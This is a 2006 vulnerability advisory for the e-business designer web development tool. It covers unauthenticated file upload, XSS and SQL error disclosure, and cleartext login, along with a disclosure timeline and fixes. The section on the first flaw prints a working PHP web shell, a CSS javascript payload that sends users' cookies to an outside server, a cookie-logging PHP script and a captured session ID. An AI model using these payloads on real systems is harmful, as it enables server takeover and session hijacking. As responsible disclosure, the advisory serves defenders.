eBD-en.txt

`  
===============================  
- Advisory -  
===============================  
  
Tittle: Several flaws in e-business designer  
Risk: Critical  
Date: 03.May.2006  
Author: Pedro Andújar <pandujar *@* selfdefense.es>  
URL: http://www.digitalsec.es  
http://www.514.es/   
  
  
.: [ INTRO ] :.  
  
eBD is an Integrated Development Environment for the development and publication of web sites,  
web applications and web services (Applications). In about 60% of the time typically required,   
Designer expedites the creation of Applications based on an open architecture, accepted web   
standards and without the need for in-depth knowledge about web technology.  
  
With eBD, you can develop any type of web application, web site or web service - intranet,   
extranet, eCommerce, eLearning portals, etc. You can deploy legacy applications on the web   
without re-coding the original application.  
  
eBusiness Designer has three distinct functional layers - Presentation, Data and Back Office.   
This structure permits a non-technical staff member to update any Application in real time,   
preview and publish it.  
  
  
.: [ TECHNICAL DESCRIPTION ] :.  
  
During the development of some evaluation tasks against applications managed by the e-businness   
designer software, several bugs were discovered:  
  
  
.: [ BUG #1 ]  
  
Risk : High  
Description : Ability to upload files to the system without authentication  
Affected versions : <= v3.1.4  
  
Access to a web edition tool without authentication, allow remote users to upload files without  
restriction. This vulnerability can be achieved accessing the following URL:  
  
http://ebdsite/common/html_editor/image_browser.upload.html  
  
The file can be placed in different folders of the application, usually it can be easily found  
exploring the web source code and searching the images folder. Another useful tool to  
find the file is:  
  
http://edbsite/common/html_editor/image_browser.html  
  
Additionally we have the html edition tool, whose parameters are:  
  
function abre_html_editor(form_name,name,ancho,alto,idvista,atributo,source,links)  
{  
var argumentos = "form_name=" + form_name + "&name=" + name + "&source=" + source +  
"&ebd_links=" + links;  
  
if (idvista != null && idvista > 0)  
argumentos += "&usar_vista=" + idvista;  
  
if (atributo != null && atributo.length > 0)  
argumentos += "&usar_atributo=" + atributo;  
  
var href = "/common/html_editor/html_editor.html?"  
  
  
The result of this vulnerability consists in the ability of upload and/or modify files in  
the system, giving the possiblity of attack both the server and web users.  
  
These kind of attacks were succeded against a server running 2.3.3 version of eBD:  
  
Server side exploiting:  
+ Code execution in the system using php/asp...shells : If the system has php installed,   
command execution is possible through a web browser, uploading a file with the following content:  
  
  
----------------dsr.php-----------------  
<?   
  
$out = shell_exec($_GET["cmd"]." 2>&1");  
  
echo "<pre>$out</pre>";  
  
?>  
----------------dsr.php-----------------  
  
  
Then, queries like "http://edbsite/path/to/dsr.php&cmd=uname -a ; id" can be executed.  
  
  
Client side exploiting:  
+ Cross Site Scripting (XSS), in applications with authentication methods: Uploaded files with   
"image_browser.upload.html" can overwrite application files, so it will be possible to include a   
javascript code in a cascade style sheet (.css), which will send us the cookie of users who have   
logged, through a get request to our server:  
  
background: url('javascript:document.images[1].src="http://514.es/514.php?"+document.cookie;') repeat-x bottom;  
  
We can place a script in our server to log cookies we receive, even this job is already   
done by the access_log.  
  
XXX.XXX.XXX.XXX - - [25/Apr/2006:11:04:22 +0200] "GET /514.php?SESSION_ID=133844640fde6ef7bd6a7a9e1c5c4651   
HTTP/1.1" 200 316 "http://ebdsite/?go=M8z23wqOtZxBnlKqIOyVzEdlo87WFfqH8prlq33Nju/nsQ==" "Mozilla/4.0   
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"  
  
  
Possible script:  
  
-----------------514.php------------------  
<?  
$log = "/var/tmp/debug.log";  
$img_type = "png";  
  
function load_png($img_path) {  
$img = imagecreatefrompng ($img_path);  
if ($img) {  
return $img;  
}  
}  
  
function load_gif($img_path) {  
$img = imagecreatefromgif ($img_path);  
if ($img) {  
return $img;  
}  
}  
  
function load_jpg($img_path) {  
$img = imagecreatefromjpeg ($img_path);  
if ($img) {  
return $img;  
}  
}  
  
$init = "Connection from ".$_SERVER['REMOTE_ADDR'];  
file_put_contents($log, "$init\n", FILE_APPEND);  
foreach ($_SERVER as $key => $srv) {  
file_put_contents($log, "$key=$srv\n", FILE_APPEND);  
}  
if (isset ($_GET) && count($_GET) > 0) {  
file_put_contents($log, "GET params\n", FILE_APPEND);  
foreach ($_GET as $key => $srv) {  
file_put_contents($log, "$key=$srv\n", FILE_APPEND);  
}  
}  
if (isset ($_POST) && count($_POST) > 0) {  
file_put_contents($log, "POST params\n", FILE_APPEND);  
foreach ($_POST as $key => $srv) {  
file_put_contents($log, "$key=$srv\n", FILE_APPEND);  
  
}  
}  
file_put_contents($log, "\n", FILE_APPEND);  
  
if ($img_type == "png") {  
Header("Content-type: image/png");  
ImagePNG(load_png("imgs/514.png"));  
}  
  
if ($img_type == "jpg") {  
Header("Content-type: image/jpeg");  
ImageJPEG(load_jpg("imgs/514.jpg"));  
}  
  
if ($img_type == "gif") {  
Header("Content-type: image/gif");  
ImageGIF(load_gif("imgs/514.gif"));  
}  
  
?>  
-----------------514.php------------------  
  
  
Adicionally was checked that there is no max concurrent sessions number for each user.  
This make easier this kind of attacks, because the cookies obtained by this way can be used  
as the same time that the legitimate user.  
  
  
.: [ BUG #2 ]  
  
Risk : High  
Description : Imput validation error  
Affected Versions : v2.3.3 without auth  
v3.1.4 require admin access   
  
In some parameters that are parsed by eBD, inclusion of special characters is not checked, so   
XSS or code injection attacks are possible.  
  
http://ebdsite/admin/form_grupo.html?id=<script>alert("dSR");</script>  
  
This query will give us an "alert" msg, and the server will response with a SQL message, including the path   
of the application:  
  
ERROR en: SELECT * FROM Contenido C WHERE C.idContenido=' AND 1=1 AND ( idArea IS NULL OR idArea=3 )   
-- You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version   
for the right syntax to use near '' AND 1=1 AND ( idArea IS NULL OR idArea=3 )' at line 1 at   
/usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm line 179. Stack: [/usr/eBD/ebd_modules/eBD/DB/DBMySQL.pm:179],   
[/usr/eBD/ebd_modules/eBD/DB/DBDriver.pm:377], [/usr/eBD/ebd_modules/eBD.pm:772],  
[/usr/eBD/ebd_modules/eBD/Contenido.pm:453], [/usr/eBD/htdocs/transhotel/archivos/dhandler:28],   
[/usr/eBD/htdocs/ebdsite/archivos/autohandler:3]  
  
Same error on version 2.3.3 of eBD with the following path requests :  
  
* http://ebdsite/archivos/' or  
* http://ebdsite/files/'  
  
  
.: [ BUG #3 ]  
  
Risk : Medium  
Description : Clear password on auth  
Affected Versions : <= v3.1.4  
  
  
In the authentication step, through http (by default) instead of https, username and password   
fields are in plain text during posting:  
  
zona=inicial&username=DSR&password=514&entrar=Login  
  
  
  
.: [ CHANGELOG ] :.  
  
* 24/Apr/2006: - Several flaws discovered, during the evaluation of the software installed   
by a e-business designer customer.   
  
* 25/Apr/2006: - Explotation of these discovered flaws.  
- Asked for security contact at eBD.  
  
* 26/Apr/2006: - Rough draft of this document finished.  
- Advisory sent to <[email protected]>.  
- Commentaries of eBD. Affected versions of each flaw cleared.  
  
* 27/Apr/2006: - Some changes in this text.  
  
* 02/May/2006: - Oasyssoft releases emergency patch for file uploading bug.  
(http://lists.oasyssoft.com/ebd-devel/200605/msg00000.html)  
  
* 03/May/2006 - New comments and changes in the adv.  
  
* 10/May/2006: - Public disclosure.  
  
  
.: [ SOLUTIONS ] :.  
  
- Update to the last available version (3.1.4)   
- Emergency Patch instalation.   
(http://lists.oasyssoft.com/ebd-devel/200605/binNr7awTFdvt.bin)  
  
(Waiting for final release on early June)  
  
- Others:  
+ Disable the directory listing in the web server.  
+ Force the navigation through https.  
+ Disable php and/or asp support in the system if it is not required.  
+ Apply firewall solutions or ModSecurity related.  
+ Delete test accounts and check for strong passwords.  
  
  
.: [ ACKNOWLEDGEMENTS ] :.  
  
Thanks To A. Tarascó and J. Olascoaga for Xss help.  
Thanks to Gandalfj for the translation.  
Greetings to bRaCu and ppl of !dSR, 514, haxorcitos and dlnd-0.  
  
  
.: [ REFERENCES ] :.  
  
[+] [eBD] e-business designer   
http://www.ebdsoft.com/   
  
[+] Cross Site Scripting FAQ  
http://www.cgisecurity.com/articles/xss-faq.shtml  
  
[+] NGS Advanced Sql Injection  
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf  
  
[+] ModSecurity (Open source web application firewall)  
http://www.modsecurity.org/  
  
[+] Guide to Building Secure Web Applications  
http://www.owasp.org/documentation/guide/guide_about.html  
  
[+] !dSR - Digital Security Research  
http://www.digitalsec.net/  
  
[+] 514 - 77  
http://www.514.es/  
  
  
  
-=EOF=-  
`